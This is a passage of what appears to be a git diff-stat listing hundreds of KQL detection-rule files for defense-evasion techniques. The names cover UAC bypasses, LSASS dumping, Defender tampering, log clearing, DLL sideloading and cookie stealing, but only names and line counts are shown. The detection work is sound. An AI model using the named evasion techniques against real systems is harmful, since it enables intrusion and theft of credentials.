..._file_open_handler_executes_powershell.kql | 10 + .../decode_base64_encoded_text.kql | 12 + .../decode_base64_encoded_text_macos.kql | 12 + ...scan_shellex_context_menu_registry_key.kql | 12 + .../devicecredentialdeployment_execution.kql | 13 + ...launcher_exe_executes_specified_binary.kql | 12 + ...ibrary_sdiageng_dll_loaded_by_msdt_exe.kql | 10 + .../directory_removal_via_rmdir.kql | 14 ++ ...ore_mode_dsrm_registry_value_tampering.kql | 16 ++ ...ministrative_share_creation_at_startup.kql | 10 + ...network_protection_on_windows_defender.kql | 10 + .../disable_macro_runtime_scan_scope.kql | 10 + ...crosoft_defender_firewall_via_registry.kql | 10 + .../disable_or_stop_services.kql | 12 + ...rivacy_settings_experience_in_registry.kql | 12 + ...ble_pua_protection_on_windows_defender.kql | 10 + .../disable_security_tools.kql | 12 + ..._tamper_protection_on_windows_defender.kql | 10 + ...indows_defender_av_security_monitoring.kql | 12 + ...nder_functionalities_via_registry_keys.kql | 13 + ...ble_windows_event_logging_via_registry.kql | 12 + .../disable_windows_firewall_by_registry.kql | 10 + .../disable_windows_iis_http_logging.kql | 10 + .../disabled_ie_security_features.kql | 10 + .../disabled_volume_snapshots.kql | 12 + .../disabled_windows_defender_eventlog.kql | 12 + .../disabling_security_tools.kql | 12 + ...der_wmi_autologger_session_via_reg_exe.kql | 15 ++ ...ion_from_potential_suspicious_location.kql | 12 + ...de_uncommon_script_extension_execution.kql | 14 ++ .../dism_remove_online_package.kql | 12 + ...splaying_hidden_files_feature_disabled.kql | 12 + .../dll_execution_via_rasautou_exe.kql | 12 + ...stem_process_from_suspicious_locations.kql | 10 + ...from_suspicious_location_via_cmspt_exe.kql | 12 + .../dll_loaded_via_certoc_exe.kql | 10 + .../dll_sideloading_of_shellchromeapi_dll.kql | 12 + ...erserver_function_call_via_msiexec_exe.kql | 10 + ...r_dll_loaded_by_scripting_applications.kql | 10 + ..._to_disallowed_images_in_hvci_registry.kql | 13 + ...iver_dll_installation_via_odbcconf_exe.kql | 12 + ...naries_into_spool_drivers_color_folder.kql | 10 + .../dumpminitool_execution.kql | 10 + .../dumpstack_log_defender_evasion.kql | 10 + .../dynamic_csharp_compile_artefact.kql | 13 + .../dynamic_net_compilation_via_csc_exe.kql | 14 ++ ...ocal_manifest_installation_with_winget.kql | 12 + ...nymous_computer_allowanonymouscallback.kql | 12 + ...syslog_configuration_change_via_esxcli.kql | 12 + ...amper_in_net_processes_via_commandline.kql | 14 ++ .../etw_trace_evasion_activity.kql | 11 + .../eventlog_evtx_file_deleted.kql | 10 + .../evtx_created_in_uncommon_location.kql | 16 ++ ...ange_powershell_cmdlet_history_deleted.kql | 12 + .../execute_files_with_msdeploy_exe.kql | 12 + .../execute_from_alternate_data_streams.kql | 10 + ...execute_pcwrun_exe_to_leverage_follina.kql | 12 + .../execution_dll_of_choice_using_wab_exe.kql | 10 + .../execution_of_non_existing_file.kql | 10 + ...tion_of_suspicious_file_type_extension.kql | 12 + .../execution_via_stordiag_exe.kql | 12 + .../execution_via_workfolders_exe.kql | 12 + .../explorer_process_tree_break.kql | 12 + ...coded_from_base64_hex_via_certutil_exe.kql | 10 + .../file_deleted_via_sysinternals_sdelete.kql | 12 + KQL/rules/Defense Evasion/file_deletion.kql | 12 + .../Defense Evasion/file_deletion_via_del.kql | 16 ++ ...ile_download_using_protocolhandler_exe.kql | 11 + .../file_download_via_bitsadmin.kql | 12 + ...itsadmin_to_a_suspicious_target_folder.kql | 10 + ...bitsadmin_to_an_uncommon_target_folder.kql | 10 + .../file_download_via_installutil_exe.kql | 11 + .../file_download_via_nscurl_macos.kql | 12 + ...load_via_windows_defender_mpcmprun_exe.kql | 10 + .../file_download_with_headless_browser.kql | 10 + ...ile_encoded_to_base64_via_certutil_exe.kql | 12 + ...ion_encoded_to_base64_via_certutil_exe.kql | 10 + .../file_time_attribute_change.kql | 10 + ...ous_extension_downloaded_via_bitsadmin.kql | 10 + ...stem_dll_name_in_unsuspected_locations.kql | 14 ++ ..._process_name_in_unsuspected_locations.kql | 15 ++ .../filter_driver_unloaded_via_fltmc_exe.kql | 10 + .../findstr_launching_lnk_file.kql | 10 + .../firewall_disabled_via_netsh_exe.kql | 12 + .../firewall_rule_deleted_via_netsh_exe.kql | 13 + .../firewall_rule_update_via_netsh_exe.kql | 13 + .../flush_iptables_ufw_chain.kql | 12 + ...t_guard_protectedfolders_list_registry.kql | 12 + ...orfiles_exe_child_process_masquerading.kql | 11 + .../fsutil_suspicious_invocation.kql | 15 ++ .../gatekeeper_bypass_via_xattr.kql | 12 + .../Defense Evasion/gpscript_execution.kql | 12 + .../greedy_file_deletion_using_del.kql | 10 + .../hacktool_edrsilencer_execution.kql | 13 + .../hacktool_empire_powershell_uac_bypass.kql | 10 + .../hacktool_f_secure_c3_load_by_rundll32.kql | 10 + ...rootkit_detector_and_remover_execution.kql | 12 + .../hacktool_krbrelayup_execution.kql | 12 + .../hacktool_powertool_execution.kql | 12 + .../hacktool_rubeus_execution.kql | 12 + .../hacktool_sharpevtmute_execution.kql | 10 + ...ool_wmiexec_default_powershell_command.kql | 12 + .../hacktool_xordump_execution.kql | 12 + .../Defense Evasion/hh_exe_execution.kql | 12 + ...et_on_file_directory_via_chflags_macos.kql | 14 ++ .../Defense Evasion/hidden_user_creation.kql | 12 + ...e_schedule_task_via_index_value_tamper.kql | 14 ++ .../hiding_files_with_attrib_exe.kql | 13 + ...count_via_specialaccounts_registry_key.kql | 10 + ...ecialaccounts_registry_key_commandline.kql | 13 + ...l_help_hh_exe_suspicious_child_process.kql | 10 + ...visor_enforced_code_integrity_disabled.kql | 11 + ...r_enforced_paging_translation_disabled.kql | 11 + ..._to_mycomputer_zone_for_http_protocols.kql | 11 + .../iis_webserver_access_logs_deleted.kql | 13 + ...log_deletion_via_commandline_utilities.kql | 15 ++ ...devices_unusual_parent_child_processes.kql | 10 + ..._removal_on_host_clear_mac_system_logs.kql | 12 + ...cution_by_program_compatibility_wizard.kql | 13 + ...xecution_from_script_file_via_bash_exe.kql | 12 + ..._inline_command_execution_via_bash_exe.kql | 12 + .../infdefaultinstall_exe_inf_execution.kql | 10 + ...itive_subfolder_search_via_findstr_exe.kql | 13 + ..._new_package_via_winget_local_manifest.kql | 15 ++ .../install_root_certificate.kql | 12 + ...lorer_disablefirstruncustomize_enabled.kql | 13 + .../invoke_obfuscation_clip_launcher.kql | 10 + ...nvoke_obfuscation_compress_obfuscation.kql | 10 + ..._obfuscation_obfuscated_iex_invocation.kql | 10 + .../invoke_obfuscation_stdin_launcher.kql | 10 + .../invoke_obfuscation_var_launcher.kql | 10 + ...e_obfuscation_var_launcher_obfuscation.kql | 10 + .../invoke_obfuscation_via_stdin.kql | 10 + .../invoke_obfuscation_via_use_clip.kql | 10 + .../invoke_obfuscation_via_use_mshta.kql | 10 + .../jscript_compiler_execution.kql | 14 ++ ...kavremover_dropped_binary_lolbin_usage.kql | 10 + .../kernel_memory_dump_via_livekd.kql | 12 + .../launch_vsdevshell_ps1_proxy_execution.kql | 12 + ...legitimate_application_dropped_archive.kql | 10 + ...itimate_application_dropped_executable.kql | 10 + .../legitimate_application_dropped_script.kql | 10 + .../linux_base64_encoded_pipe_to_shell.kql | 12 + .../linux_base64_encoded_shebang_in_cli.kql | 12 + .../linux_doas_conf_file_creation.kql | 12 + .../linux_doas_tool_execution.kql | 12 + .../linux_package_uninstall.kql | 12 + .../linux_shell_pipe_to_shell.kql | 12 + .../livekd_driver_creation.kql | 12 + ...kd_driver_creation_by_uncommon_process.kql | 12 + ...livekd_kernel_memory_dump_file_created.kql | 12 + ...ol_binary_copied_from_system_directory.kql | 11 + .../lolbin_runexehelper_use_as_proxy.kql | 10 + .../lolbin_unregmp2_exe_use_as_proxy.kql | 10 + ...sa_ppl_protection_disabled_via_reg_exe.kql | 12 + ...on_by_microsoft_visual_studio_debugger.kql | 15 ++ ...nents_file_execution_by_taef_detection.kql | 14 ++ ...inject_inject_dll_into_running_process.kql | 10 + .../maxmpxct_registry_value_changed.kql | 13 + .../microsoft_office_dll_sideload.kql | 12 + ...crosoft_office_protected_view_disabled.kql | 12 + .../modify_group_policy_settings.kql | 12 + .../msdt_execution_via_answer_file.kql | 13 + ...cution_with_suspicious_file_extensions.kql | 16 ++ ...ll_runhtmlapplication_suspicious_usage.kql | 13 + .../msiexec_quiet_installation.kql | 14 ++ .../Defense Evasion/msiexec_web_install.kql | 12 + .../Defense Evasion/msxsl_exe_execution.kql | 14 ++ ..._policy_on_microsoft_defender_firewall.kql | 12 + ..._connection_initiated_by_addinutil_exe.kql | 12 + ...capture_session_launched_via_dxcap_exe.kql | 13 + .../new_dll_registered_via_odbcconf_exe.kql | 12 + .../new_file_association_using_exefile.kql | 10 + .../new_firewall_rule_added_via_netsh_exe.kql | 13 + .../new_process_created_via_taskmgr_exe.kql | 12 + ..._certificate_installed_via_certmgr_exe.kql | 14 ++ ...certificate_installed_via_certutil_exe.kql | 14 ++ .../node_process_executions.kql | 10 + ...rshell_download_cradle_processcreation.kql | 10 + .../ntdllpipe_like_activity_execution.kql | 10 + ...l_msi_install_via_windowsinstaller_com.kql | 15 ++ ...fuscated_powershell_oneliner_execution.kql | 10 + .../odbcconf_exe_suspicious_dll_location.kql | 12 + ...network_connection_over_uncommon_ports.kql | 12 + ...tls1_0_tls1_1_protocol_version_enabled.kql | 12 + ...nt_file_dropped_in_suspicious_location.kql | 12 + ...xecution_of_malicious_embedded_scripts.kql | 14 ++ ...openwith_exe_executes_specified_binary.kql | 10 + ...work_connection_initiated_by_cmstp_exe.kql | 12 + ...k_connection_to_public_ip_via_winlogon.kql | 12 + .../outgoing_logon_with_new_credentials.kql | 12 + ...rd_provided_in_command_line_of_net_exe.kql | 10 + .../pdf_file_created_by_regedit_exe.kql | 14 ++ KQL/rules/Defense Evasion/ping_hex_ip.kql | 12 + .../potential_7za_dll_sideloading.kql | 12 + .../potential_adplus_exe_abuse.kql | 12 + .../potential_amsi_bypass_using_null_bits.kql | 10 + ...tential_amsi_bypass_via_net_reflection.kql | 12 + .../potential_amsi_com_server_hijacking.kql | 10 + ...ial_antivirus_software_dll_sideloading.kql | 14 ++ ...cation_whitelisting_bypass_via_dnx_exe.kql | 14 ++ ..._arbitrary_code_execution_via_node_exe.kql | 12 + ...trary_command_execution_using_msdt_exe.kql | 10 + ...ntial_arbitrary_dll_load_using_winword.kql | 10 + ...file_download_using_office_application.kql | 10 + ...t_manager_settings_associations_tamper.kql | 12 + ...nt_manager_settings_attachments_tamper.kql | 12 + ...otential_autologger_sessions_tampering.kql | 10 + .../potential_base64_decoded_from_images.kql | 11 + ..._proxy_execution_via_vsdiagnostics_exe.kql | 12 + .../potential_ccleanerdu_dll_sideloading.kql | 12 + ...al_ccleanerreactivator_dll_sideloading.kql | 12 + ...al_chrome_frame_helper_dll_sideloading.kql | 10 + ...nd_line_path_traversal_evasion_attempt.kql | 13 + ...ne_obfuscation_using_escape_characters.kql | 10 + ...icode_characters_from_suspicious_image.kql | 12 + ...ealing_via_chromium_headless_debugging.kql | 10 + ...ivity_via_emoji_usage_in_commandline_1.kql | 10 + ...ivity_via_emoji_usage_in_commandline_2.kql | 10 + ...ivity_via_emoji_usage_in_commandline_3.kql | 10 + ...ivity_via_emoji_usage_in_commandline_4.kql | 10 + ...tial_defense_evasion_via_binary_rename.kql | 12 + ...via_rename_of_highly_relevant_binaries.kql | 13 + ...nse_evasion_via_right_to_left_override.kql | 14 ++ ...tential_dll_sideloading_of_dbgcore_dll.kql | 12 + ...tential_dll_sideloading_of_dbghelp_dll.kql | 12 + ...sideloading_of_libcurl_dll_via_gup_exe.kql | 10 + ..._sideloading_via_classicexplorer32_dll.kql | 10 + ...ntial_dll_sideloading_via_comctl32_dll.kql | 12 + ...potential_dll_sideloading_via_jsschhlp.kql | 10 + ...ded_powershell_patterns_in_commandline.kql | 10 + ...ntial_eventlog_file_location_tampering.kql | 10 + ...al_fake_instance_of_hxtsr_exe_executed.kql | 13 + ...d_via_ms_appinstaller_protocol_handler.kql | 12 + ...ation_via_ntfs_index_allocation_stream.kql | 13 + ...n_via_ntfs_index_allocation_stream_cli.kql | 13 + ...lyph_attack_using_lookalike_characters.kql | 15 ++ ...using_lookalike_characters_in_filename.kql | 15 ++ ...otential_lethalhta_technique_execution.kql | 10 + .../potential_libvlc_dll_sideloading.kql | 12 + ...ential_lsass_process_dump_via_procdump.kql | 17 ++ ...anage_bde_wsf_abuse_to_proxy_execution.kql | 12 + ...ial_memory_dumping_activity_via_livekd.kql | 12 + ...tial_meterpreter_cobaltstrike_activity.kql | 13 + .../potential_mftrace_exe_abuse.kql | 12 + .../potential_msiexec_masquerading.kql | 10 + ...tential_ntlm_coercion_via_certutil_exe.kql | 10 + ...l_obfuscated_ordinal_call_via_rundll32.kql | 10 + ...word_spraying_attempt_using_dsacls_exe.kql | 12 + ..._pendingfilerenameoperations_tampering.kql | 13 + ...tial_persistence_via_outlook_home_page.kql | 12 + ...ial_persistence_via_outlook_today_page.kql | 12 + .../potential_powershell_downgrade_attack.kql | 10 + ..._powershell_execution_policy_tampering.kql | 10 + ...xecution_policy_tampering_proccreation.kql | 10 + ...potential_powershell_execution_via_dll.kql | 12 + ...hell_obfuscation_via_reversed_commands.kql | 12 + ...lation_attempt_via_exe_local_technique.kql | 10 + ..._execution_proxy_via_cl_invocation_ps1.kql | 10 + ...y_key_abuse_for_binary_proxy_execution.kql | 10 + ...y_abuse_for_binary_proxy_execution_reg.kql | 10 + ...aunch_exe_binary_proxy_execution_abuse.kql | 10 + ...thorized_mbr_tampering_via_bcdedit_exe.kql | 10 + ...ntial_register_app_vbs_lolscript_abuse.kql | 12 + ...tial_regsvr32_commandline_flag_anomaly.kql | 12 + ...dll32_execution_with_dll_stored_in_ads.kql | 10 + ...xy_execution_via_cl_mutexverifiers_ps1.kql | 10 + ..._bypass_via_windows_developer_features.kql | 10 + ...ia_windows_developer_features_registry.kql | 10 + ...potential_suspicious_mofcomp_execution.kql | 13 + ...s_windows_feature_enabled_proccreation.kql | 14 ++ ...otential_sysinternals_procdump_evasion.kql | 12 + ..._sideloading_from_non_system_locations.kql | 12 + ...pering_with_security_products_via_wmic.kql | 12 + ...azuh_security_platform_dll_sideloading.kql | 12 + ...t_reflectdebugger_registry_value_abuse.kql | 10 + ...indows_defender_tampering_via_wmic_exe.kql | 10 + .../potential_winnti_dropper_activity.kql | 10 + ...e_permissions_granted_using_dsacls_exe.kql | 12 + ...asp_net_compilation_via_aspnetcompiler.kql | 10 + ...ally_suspicious_cabinet_file_expansion.kql | 12 + ...ous_call_to_win32_nteventlogfile_class.kql | 10 + ...icious_child_process_of_diskshadow_exe.kql | 12 + ...y_suspicious_child_process_of_regsvr32.kql | 12 + ...ous_child_processes_spawned_by_conhost.kql | 12 + ...y_suspicious_cmd_shell_output_redirect.kql | 14 ++ ...icious_dll_registered_via_odbcconf_exe.kql | 12 + ...ally_suspicious_dmp_hdmp_file_creation.kql | 12 + ..._suspicious_event_viewer_child_process.kql | 10 + ...n_from_parent_process_in_public_folder.kql | 11 + ...y_suspicious_execution_from_tmp_folder.kql | 10 + ..._regasm_regsvcs_from_uncommon_location.kql | 10 + ...regasm_regsvcs_with_uncommon_extension.kql | 10 + ..._suspicious_googleupdate_child_process.kql | 10 + ...ocument_executed_from_trusted_location.kql | 10 + ...spicious_ping_copy_command_combination.kql | 11 + ...y_suspicious_regsvr32_http_ftp_pattern.kql | 10 + ...ly_suspicious_regsvr32_http_ip_pattern.kql | 12 + ...tentially_suspicious_rundll32_activity.kql | 12 + ...ous_rundll32_exe_execution_of_udl_file.kql | 14 ++ ...s_volume_shadow_copy_vsstrace_dll_load.kql | 10 + ...y_suspicious_wdac_policy_file_creation.kql | 13 + ...tially_suspicious_windows_app_activity.kql | 12 + ..._suspicious_wuauclt_network_connection.kql | 12 + ...base64_encoded_frombase64string_cmdlet.kql | 10 + ...ell_base64_encoded_mppreference_cmdlet.kql | 10 + ...owershell_console_history_logs_deleted.kql | 10 + ...core_dll_loaded_via_office_application.kql | 10 + ...wershell_defender_disable_scan_feature.kql | 13 + .../powershell_defender_exclusion.kql | 13 + ...fault_action_set_to_allow_or_noaction_.kql | 15 ++ ...executed_from_headless_conhost_process.kql | 12 + ...ng_disabled_via_registry_key_tampering.kql | 10 + ...l_script_change_permission_via_set_acl.kql | 10 + .../powershell_set_acl_on_windows_folder.kql | 10 + ...ell_token_obfuscation_process_creation.kql | 10 + .../Defense Evasion/prefetch_file_deleted.kql | 10 + .../Defense Evasion/procdump_execution.kql | 12 + ...ss_access_via_trolleyexpress_exclusion.kql | 10 + ...rocess_creation_using_sysnative_folder.kql | 10 + ...n_from_a_potentially_suspicious_folder.kql | 10 + .../process_launched_without_image_name.kql | 12 + .../process_memory_dump_via_comsvcs_dll.kql | 12 + .../process_memory_dump_via_dotnet_dump.kql | 13 + ...ocess_proxy_execution_via_squirrel_exe.kql | 13 + .../proxy_execution_via_vshadow.kql | 16 ++ .../proxy_execution_via_wuauclt_exe.kql | 10 + ...olicytest_creation_by_uncommon_process.kql | 10 + .../pua_advancedrun_suspicious_execution.kql | 10 + .../pua_cleanwipe_execution.kql | 12 + .../pua_defendercheck_execution.kql | 12 + ...ential_pe_metadata_tamper_using_rcedit.kql | 12 + .../pua_process_hacker_execution.kql | 15 ++ ...nt_file_dropped_in_suspicious_location.kql | 12 + .../pubprn_vbs_proxy_execution.kql | 10 + ...ion_security_warning_disabled_in_excel.kql | 12 + ...ity_warning_disabled_in_excel_registry.kql | 12 + ...ython_image_load_by_non_python_process.kql | 17 ++ .../Defense Evasion/raccine_uninstall.kql | 12 + .../rdp_connection_allowed_via_netsh_exe.kql | 12 + .../rdp_sensitive_settings_changed.kql | 14 ++ ...rdp_sensitive_settings_changed_to_zero.kql | 14 ++ ...ion_without_commandline_flags_or_files.kql | 14 ++ ...iating_network_connection_to_public_ip.kql | 10 + .../regedit_as_trusted_installer.kql | 12 + .../register_app_vbs_proxy_execution.kql | 12 + .../registry_entries_for_azorult_malware.kql | 10 + ...y_persistence_via_service_in_safe_mode.kql | 10 + ...ecution_with_suspicious_file_extension.kql | 12 + ...cution_from_highly_suspicious_location.kql | 12 + ...ion_from_potential_suspicious_location.kql | 12 + ..._rurat_execution_from_unusual_location.kql | 10 + ...chm_file_download_execution_via_hh_exe.kql | 10 + .../remote_code_execute_via_winrm_vbs.kql | 10 + .../remote_file_download_via_findstr_exe.kql | 11 + .../remote_xsl_execution_via_msxsl_exe.kql | 12 + ...ablement_abuse_via_atomictestharnesses.kql | 10 + ...hosted_hta_file_executed_via_mshta_exe.kql | 10 + ...removal_of_amsi_provider_registry_keys.kql | 12 + ...x_value_to_hide_schedule_task_registry.kql | 10 + ...d_value_to_hide_schedule_task_registry.kql | 10 + .../remove_immutable_file_attribute.kql | 12 + .../remove_scheduled_cron_task_job.kql | 12 + .../renamed_autohotkey_exe_execution.kql | 10 + .../renamed_boinc_client_execution.kql | 10 + .../renamed_createdump_utility_execution.kql | 12 + .../renamed_mavinject_exe_execution.kql | 12 + .../renamed_megasync_execution.kql | 13 + .../renamed_microsoft_teams_execution.kql | 10 + .../renamed_msdt_exe_execution.kql | 12 + .../renamed_office_binary_execution.kql | 10 + .../renamed_plink_execution.kql | 10 + .../renamed_procdump_execution.kql | 15 ++ ...d_remote_utilities_rat_rurat_execution.kql | 10 + ...sponse_file_execution_via_odbcconf_exe.kql | 12 + ...tificate_installed_from_susp_locations.kql | 12 + .../run_powershell_script_from_ads.kql | 10 + ...ll_script_from_redirected_input_stream.kql | 10 + ..._execution_with_uncommon_dll_extension.kql | 10 + ...ecution_without_commandline_parameters.kql | 12 + .../rundll32_installscreensaver_execution.kql | 12 + .../rundll32_internet_connection.kql | 12 + .../rundll32_spawned_via_explorer_exe.kql | 10 + .../rundll32_spawning_explorer.kql | 10 + .../rundll32_unc_path_execution.kql | 12 + .../runmru_registry_key_deletion.kql | 13 + .../runmru_registry_key_deletion_registry.kql | 13 + ...eboot_registry_key_deleted_via_reg_exe.kql | 12 + .../Defense Evasion/scr_file_write_event.kql | 12 + .../screensaver_registry_key_set.kql | 12 + ...ostics_turn_off_check_enabled_registry.kql | 12 + ...g_commandline_process_spawned_regsvr32.kql | 13 + .../Defense Evasion/sdclt_child_processes.kql | 10 + ...nhost_calling_suspicious_child_process.kql | 10 + .../security_service_disabled_via_reg_exe.kql | 12 + ...e_from_potentially_suspicious_location.kql | 14 ++ ...ted_in_potentially_suspicious_location.kql | 13 + ...rvice_registry_key_deleted_via_reg_exe.kql | 12 + ...files_as_system_files_using_attrib_exe.kql | 11 + .../Defense Evasion/setuid_and_setgid.kql | 12 + ...tion_using_operating_systems_utilities.kql | 13 + ..._dll_execution_in_suspicious_directory.kql | 10 + .../space_after_filename_macos.kql | 12 + .../start_of_nt_virtual_dos_machine.kql | 12 + .../suspect_svchost_activity.kql | 12 + ...spicious_advpack_call_via_rundll32_exe.kql | 12 + ...ous_agentexecutor_powershell_execution.kql | 10 + ...lication_allowed_through_exploit_guard.kql | 12 + ..._access_agent_update_utility_execution.kql | 12 + ...us_cabinet_file_execution_via_msdt_exe.kql | 12 + .../suspicious_calculator_usage.kql | 11 + ...icious_child_process_created_as_system.kql | 10 + ...icious_child_process_of_aspnetcompiler.kql | 10 + ...suspicious_child_process_of_wermgr_exe.kql | 10 + .../suspicious_codepage_switch_via_chcp.kql | 12 + .../suspicious_control_panel_dll_load.kql | 10 + ...cious_copy_from_or_to_system_directory.kql | 16 ++ .../suspicious_creation_with_colorcpl.kql | 10 + .../suspicious_customshellhost_execution.kql | 13 + ...diantz_alternate_data_stream_execution.kql | 12 + .../suspicious_dll_loaded_via_certoc_exe.kql | 10 + .../suspicious_double_extension_files.kql | 12 + ..._download_from_direct_ip_via_bitsadmin.kql | 10 + ...rom_file_sharing_website_via_bitsadmin.kql | 12 + .../suspicious_download_via_certutil_exe.kql | 10 + ...iver_dll_installation_via_odbcconf_exe.kql | 12 + .../suspicious_dumpminitool_execution.kql | 10 + ...vironment_variable_has_been_registered.kql | 10 + ...aring_or_configuration_change_activity.kql | 16 ++ .../suspicious_executable_file_creation.kql | 12 + ...s_execution_of_installutil_without_log.kql | 10 + ...trac32_alternate_data_stream_execution.kql | 10 + ...s_file_created_via_onenote_application.kql | 13 + ...le_creation_in_uncommon_appdata_folder.kql | 12 + ...loaded_from_direct_ip_via_certutil_exe.kql | 10 + ..._file_sharing_website_via_certutil_exe.kql | 10 + ...ile_encoded_to_base64_via_certutil_exe.kql | 10 + ...suspicious_files_in_default_gpo_folder.kql | 10 + .../suspicious_hh_exe_execution.kql | 10 + ...h_integritylevel_conhost_legacy_option.kql | 12 + ...iis_url_globalrules_rewrite_via_appcmd.kql | 12 + ...ous_javascript_execution_via_mshta_exe.kql | 10 + ...ious_lnk_double_extension_file_created.kql | 13 + ...picious_microsoft_office_child_process.kql | 10 + ...d_execution_by_uncommon_parent_process.kql | 10 + .../suspicious_msdt_parent_process.kql | 10 + .../suspicious_mshta_child_process.kql | 13 + .../suspicious_msiexec_embedding_parent.kql | 10 + ...spicious_msiexec_execute_arbitrary_dll.kql | 14 ++ ...xec_quiet_install_from_remote_location.kql | 10 + ...twork_connection_binary_no_commandline.kql | 10 + .../suspicious_obfuscated_powershell_code.kql | 10 + .../suspicious_package_installed_linux.kql | 12 + ...parent_double_extension_file_execution.kql | 10 + ...eyboard_layout_ime_file_registry_value.kql | 13 + ...uspicious_ping_del_command_combination.kql | 10 + ...xecution_to_change_lock_screen_timeout.kql | 10 + ...l_invocations_specific_processcreation.kql | 10 + ...us_process_masquerading_as_svchost_exe.kql | 14 ++ .../suspicious_process_parents.kql | 10 + .../suspicious_process_start_locations.kql | 12 + ..._via_werfaultsecure_through_edr_freeze.kql | 13 + ...ous_procexp152_sys_file_created_in_tmp.kql | 14 ++ ..._whitelisted_in_firewall_via_netsh_exe.kql | 10 + ...uspicious_provlaunch_exe_child_process.kql | 10 + .../suspicious_rasdial_activity.kql | 12 + .../suspicious_recursive_takeown.kql | 13 + ...s_regsvr32_execution_from_remote_share.kql | 10 + ...sponse_file_execution_via_odbcconf_exe.kql | 12 + ...us_rundll32_activity_invoking_sys_file.kql | 10 + ...undll32_execution_with_image_extension.kql | 10 + ...picious_rundll32_setupapi_dll_activity.kql | 12 + .../suspicious_service_binary_directory.kql | 10 + .../suspicious_service_installed.kql | 14 ++ ...ious_shellexec_rundll_call_via_ordinal.kql | 12 + ...us_speech_runtime_binary_child_process.kql | 14 ++ .../suspicious_splwow64_without_params.kql | 10 + ...indows_defender_feature_via_powershell.kql | 11 + .../suspicious_usage_of_shellexec_rundll.kql | 10 + ...ous_volume_shadow_copy_vss_ps_dll_load.kql | 13 + ...ous_volume_shadow_copy_vssapi_dll_load.kql | 10 + ...t_command_with_agentextensionpath_load.kql | 12 + ...der_folder_exclusion_added_via_reg_exe.kql | 12 + ...der_registry_key_tampering_via_reg_exe.kql | 13 + .../suspicious_windows_service_tampering.kql | 13 + ...race_etw_session_tamper_via_logman_exe.kql | 13 + ...ous_windows_update_agent_empty_cmdline.kql | 11 + ...uspicious_wordpad_outbound_connections.kql | 14 ++ ...cious_workstation_locking_via_rundll32.kql | 12 + ...icious_x509enrollment_process_creation.kql | 12 + ...picious_xor_encoded_powershell_command.kql | 10 + ...rver_execute_arbitrary_powershell_code.kql | 12 + ..._vbs_execute_arbitrary_powershell_code.kql | 10 + ...ternals_pssuspend_suspicious_execution.kql | 12 + ...earing_or_removal_via_system_utilities.kql | 14 ++ .../sysmon_configuration_update.kql | 12 + .../sysmon_driver_altitude_change.kql | 14 ++ .../sysmon_driver_unloaded_via_fltmc_exe.kql | 12 + ...nel_item_loaded_from_uncommon_location.kql | 10 + ...system_file_execution_location_anomaly.kql | 11 + ...information_discovery_via_sysctl_macos.kql | 14 ++ ...r_windows_defender_remove_mppreference.kql | 12 + .../tamper_with_sophos_av_registry_keys.kql | 12 + .../taskkill_symantec_endpoint_protection.kql | 13 + .../taskmgr_as_local_system.kql | 10 + .../teamviewer_log_file_deleted.kql | 10 + .../third_party_software_dll_sideloading.kql | 10 + .../time_travel_debugging_utility_usage.kql | 12 + ...e_travel_debugging_utility_usage_image.kql | 12 + .../tomcat_webserver_logs_deleted.kql | 13 + .../touch_suspicious_service_file.kql | 12 + ...le_cross_ebpf_rootkit_default_lockfile.kql | 12 + ...riple_cross_ebpf_rootkit_execve_hijack.kql | 12 + ...le_cross_ebpf_rootkit_install_commands.kql | 12 + ...ypass_abusing_winsat_path_parsing_file.kql | 10 + ...ss_abusing_winsat_path_parsing_process.kql | 10 + ...s_abusing_winsat_path_parsing_registry.kql | 10 + ...ac_bypass_tools_using_computerdefaults.kql | 10 + .../uac_bypass_using_changepk_and_slui.kql | 10 + ...bypass_using_consent_and_comctl32_file.kql | 10 + ...ass_using_consent_and_comctl32_process.kql | 10 + .../uac_bypass_using_disk_cleanup.kql | 10 + .../uac_bypass_using_dismhost.kql | 10 + ..._bypass_using_event_viewer_recentviews.kql | 10 + .../uac_bypass_using_eventvwr.kql | 10 + .../uac_bypass_using_ieinstal_file.kql | 10 + .../uac_bypass_using_ieinstal_process.kql | 10 + .../uac_bypass_using_iscsicpl_imageload.kql | 10 + ...using_msconfig_token_modification_file.kql | 10 + ...ng_msconfig_token_modification_process.kql | 10 + ..._bypass_using_net_code_profiler_on_mmc.kql | 10 + ...c_bypass_using_ntfs_reparse_point_file.kql | 10 + ...ypass_using_ntfs_reparse_point_process.kql | 10 + .../uac_bypass_using_pkgmgr_and_dism.kql | 10 + ...bypass_using_windows_media_player_file.kql | 10 + ...ass_using_windows_media_player_process.kql | 10 + ...ss_using_windows_media_player_registry.kql | 10 + .../uac_bypass_via_event_viewer.kql | 10 + .../uac_bypass_via_icmluautil.kql | 10 + .../Defense Evasion/uac_bypass_via_sdclt.kql | 10 + ...ss_via_windows_firewall_snap_in_hijack.kql | 10 + .../uac_bypass_via_wsreset.kql | 10 + .../Defense Evasion/uac_bypass_wsreset.kql | 10 + .../ufw_force_stop_using_ufw_init.kql | 12 + ...on_addinutil_exe_commandline_execution.kql | 11 + ...pplications_execution_via_atbroker_exe.kql | 12 + ...ncommon_child_process_of_addinutil_exe.kql | 11 + .../uncommon_child_process_of_appvlp_exe.kql | 14 ++ ...ommon_child_process_of_defaultpack_exe.kql | 10 + .../uncommon_child_process_of_setres_exe.kql | 15 ++ ..._child_process_spawned_by_odbcconf_exe.kql | 13 + ...eyboard_layout_ime_file_registry_value.kql | 15 ++ ..._file_creation_by_mysql_daemon_process.kql | 12 + ..._filesystem_load_attempt_by_format_com.kql | 11 + .../uncommon_link_exe_parent_process.kql | 15 ++ .../uncommon_outbound_kerberos_connection.kql | 13 + .../uncommon_sigverif_exe_child_process.kql | 11 + .../uncommon_svchost_parent_process.kql | 10 + .../uninstall_crowdstrike_falcon_sensor.kql | 12 + .../uninstall_sysinternals_sysmon.kql | 12 + .../unmount_share_via_net_exe.kql | 12 + .../use_icacls_to_hide_file_to_everyone.kql | 10 + .../use_ntfs_short_name_in_command_line.kql | 12 + .../use_ntfs_short_name_in_image.kql | 12 + .../Defense Evasion/use_of_remote_exe.kql | 12 + .../use_of_scriptrunner_exe.kql | 12 + ...use_of_the_sftp_exe_binary_as_a_lolbin.kql | 10 + .../Defense Evasion/use_of_ttdinject_exe.kql | 12 + .../use_of_visualuiaverifynative_exe.kql | 12 + .../use_of_vsiisexelauncher_exe.kql | 10 + KQL/rules/Defense Evasion/use_of_wfc_exe.kql | 12 + .../use_short_name_path_in_image.kql | 12 + .../utilityfunctions_ps1_proxy_dll.kql | 10 + .../verclsid_exe_runs_com_object.kql | 10 + ...driver_installation_or_starting_of_vms.kql | 12 